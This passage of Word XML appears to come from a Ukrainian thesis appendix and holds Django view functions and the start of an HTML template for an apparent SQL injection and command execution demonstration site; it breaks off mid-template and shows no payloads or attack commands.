    <w:p w14:paraId="451F0F98" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>from django.shortcuts import render</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A626F0" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>from django.http import HttpResponse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2830B488" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>from .comand_exec import ip_a, catch_request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8A9C19" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>from .models import sqli_model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33934AFE" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34B0B8EF" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t># Create your views here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB36750" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>def home_view(request, *args, **kwargs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8F54A2" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    return render(request, "index.html", exec_db_render(request))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AEAC55" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70161EC7" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>def SQLi(request, *args, **kwargs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA7B9B2" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    return render(request, "SQLi.html", exec_db_render(request))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8BAFD1" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65E4A9B5" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>def exec_db_render(request, *args, **kwargs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104F7B38" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    #obj = sqli_model.objects.get(id=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5436CD7D" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    obj = sqli_model.objects.all()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55760C73" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    ifconfig = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC88207" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    #'cheat_sheet' : obj.databases, # render exel table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23310FC0" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    'cheat_sheet' : obj,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C35FDFC" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    'com_exec' : ip_a(request), # render execution systems' comand</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5D8018" w14:textId="65D4EFCE" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    #'catch_request' : catch_request(request), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5407E080" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3C68CA" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    return ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218CE281" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34DA2F87" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>def ch_sh(request, *args, **kwargs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315E1E84" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    return render(request, "cheat_sheet.html", exec_db_render(request)) # render cheat_sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C58AF1" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F7002FC" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>def cm_ex(request, *args, **kwargs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372F69AC" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    return render(request, "comand_exec.html", exec_db_render(request)) # render com_exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F5BA16" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DF0A639" w14:textId="77777777" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>def recommends(request, *args, **kwargs): # render SQLi html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F86F3F2" w14:textId="7425B671" w:rsidR="00DE61AE" w:rsidRPr="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE61AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    return render(request, "recommendations.html")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E303203" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="00DE61AE" w:rsidRDefault="00A75083" w:rsidP="007679D8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CBE1BF5" w14:textId="216369AB" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{% load static %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64434AA3" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{% block content %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049337BE" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{% endblock content %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECE366A" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680A316F" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A21E3CA" w14:textId="662B715A" w:rsidR="00A75083" w:rsidRPr="00A75083" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A75083">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Продовження додатку А</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799F18B9" w14:textId="7B98A5E9" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A17609D" w14:textId="39FB52AA" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;link rel="stylesheet" type="text/css" href="{% static 'style/style.css' %}"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE25974" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8E78A2" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60AE427B" w14:textId="712C97DE" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1839569B" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;div class="SQLi_div"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABC3DB1" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;ul class="SQLi_ul"&gt; &lt;!-- menu div element --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529790C8" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;li class="menu"&gt;&lt;a class="active" href="#cheat_sheet" id="cheat_sheet" onclick="cheat_sheet_class()" &gt;Cheat Sheet&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9A2E90" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
